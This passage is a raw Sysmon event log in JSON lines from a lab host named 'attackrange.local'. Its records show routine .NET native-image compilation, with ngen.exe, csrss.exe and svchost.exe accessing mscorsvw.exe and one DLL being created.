{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8580,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.466\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001026B50F00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.466","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001026B50F00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8581,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.466\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001026B50F00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.466","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001026B50F00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8582,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.466\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001026B50F00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.466","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001026B50F00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8583,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.529\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001009B90F00}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.529","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001009B90F00}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8584,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.529\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001009B90F00}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.529","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001009B90F00}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8585,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.529\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-001009B90F00}\r\nTargetProcessId: 4112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.529","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-001009B90F00}","TargetProcessId":"4112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8586,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:24.904\r\nProcessGuid: {E2A3D6B1-1380-5F25-0000-001009B90F00}\r\nProcessId: 4112\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1010-0\\System.ServiceModel.Routing.dll\r\nCreationUtcTime: 2020-08-01 07:02:24.904","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:24.904","ProcessGuid":"{E2A3D6B1-1380-5F25-0000-001009B90F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1010-0\\System.ServiceModel.Routing.dll","CreationUtcTime":"2020-08-01 07:02:24.904","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8587,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.935\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-0010E0BF0F00}\r\nTargetProcessId: 3452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:24.935","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1380-5F25-0000-0010E0BF0F00}","TargetProcessId":"3452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8588,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:24.935\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1380-5F25-0000-0010E0BF0F00}\r\nTargetProcessId: 3452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 